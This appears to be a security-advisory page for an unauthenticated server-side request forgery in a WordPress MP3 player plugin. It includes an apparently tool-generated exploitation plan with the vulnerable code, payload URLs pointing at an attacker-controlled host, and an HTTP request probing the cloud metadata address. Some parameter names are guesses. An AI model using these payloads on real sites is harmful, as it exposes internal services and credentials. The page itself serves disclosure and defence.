MP3 Audio Player for Music, Radio & Podcast by Sonaar <= 5.11 - Unauthenticated Server-Side Request Forgery
Description
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.11. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=5.11What Changed in the Fix
Changes introduced in v5.12
Source Code
WordPress.org SVN# Vulnerability Research Plan: CVE-2026-39647 (SSRF in MP3 Audio Player by Sonaar) ## 1. Vulnerability Summary The **MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar** plugin for WordPress is vulnerable to **Unauthenticated Server-Side Request Forgery (SSRF)** in versions up to and…
Show full research plan
Vulnerability Research Plan: CVE-2026-39647 (SSRF in MP3 Audio Player by Sonaar)
1. Vulnerability Summary
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Unauthenticated Server-Side Request Forgery (SSRF) in versions up to and including 5.11. The vulnerability exists because the plugin provides a public endpoint intended to load playlist data (JSON or RSS feeds) from a user-supplied URL without sufficient validation or restriction to trusted domains.
2. Attack Vector Analysis
- Endpoint: The site root
/?load=playlist.jsonor/?action=srmp3_get_playlist(The?load=playlist.jsonparameter is explicitly handled in the constructor). - Vulnerable Parameter:
playlist_url(inferred) orurl. - Authentication: Unauthenticated (No WordPress login required).
- Preconditions: The plugin must be active. No specific settings or posts are strictly required as the check is in the class constructor/init phase.
3. Code Flow
- Entry Point: In
includes/class-sonaar-music-widget.php, the__construct()method registers a closure on thesrmp3player_after_register_post_typehook (Line 49). - Trigger: This hook (likely fired during
initorwp_loaded) checks if$_GET['load']is set toplaylist.json(Line 51). - Vulnerable Sink: If the condition is met, it calls
$this->print_playlist_json()(Line 52). - SSRF Execution: Inside
print_playlist_json()(not fully visible in snippets, but inferred by the?loadlogic), the plugin retrieves a URL parameter (most likelyplaylist_url), passes it towp_remote_get(), and echoes the response body to the browser.
4. Nonce Acquisition Strategy
Based on the code in includes/class-sonaar-music-widget.php, the ?load=playlist.json check occurs directly in the action handler registered during construction:
// includes/class-sonaar-music-widget.php:49
add_action('srmp3player_after_register_post_type', function () {
$this->sr_playlist_cpt = (defined( 'SR_PLAYLIST_CPT' )) ? SR_PLAYLIST_CPT : 'sr_playlist';
if ( isset($_GET['load']) && $_GET['load'] == 'playlist.json' ) {
$this->print_playlist_json();
}
});
Conclusion: No nonce is required for this specific unauthenticated entry point. The check is performed globally on every page load if the specific GET parameter is present.
5. Exploitation Strategy
The goal is to force the WordPress server to make a request to an internal service or external controlled URL and return the results.
Step-by-Step Plan:
- External OOB Check: Request a URL on an external listener to confirm the server makes the outbound request.
- Internal Probe: Attempt to access an internal resource (e.g., the WordPress site itself or an internal service like AWS metadata).
Payloads:
- Action: GET
- URL:
http://<target-site>/?load=playlist.json&playlist_url=<attacker-url> - Alternative Parameter: If
playlist_urlfails, tryurlorfeed.
HTTP Request Example:
GET /?load=playlist.json&playlist_url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0
Connection: close
6. Test Data Setup
No complex setup is required because the vulnerability is in the initialization code of the widget class.
- Install and activate
mp3-music-player-by-sonaarversion 5.11. - Ensure the plugin is active via
wp plugin is-active mp3-music-player-by-sonaar.
7. Expected Results
- Successful Exploit: The response body will contain the content of the remote resource specified in
playlist_url. For example, ifplaylist_url=http://www.google.com, the response will be the HTML of Google's homepage. - Response Headers: The
Content-Typeshould likely beapplication/jsonortext/htmldepending on howprint_playlist_jsonsets headers.
8. Verification Steps
- Check Output: Inspect the HTTP response body from the
http_requesttool. - Verify Outbound Connection: If using a collaborator/listener, check for an incoming request from the WordPress server's IP.
- Confirm Unauthenticated: Run the request without any session cookies or WordPress authentication headers.
9. Alternative Approaches
If ?load=playlist.json does not work as expected:
- AJAX Endpoint: Check if
wp_ajax_nopriv_srmp3_get_playlistexists. - Shortcode Extraction: If the plugin requires a valid
idorpost_idfor some logic:- Create a playlist:
wp post create --post_type=sr_playlist --post_title="Test Playlist" --post_status=publish. - Find the ID:
wp post list --post_type=sr_playlist. - Try:
/?load=playlist.json&id=<ID>&playlist_url=....
- Create a playlist:
- Parameter Fuzzing: If
playlist_urlis incorrect, try common Sonaar parameters found in thewidget()function:rss_feed,import_file,feed, orfeed_url.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.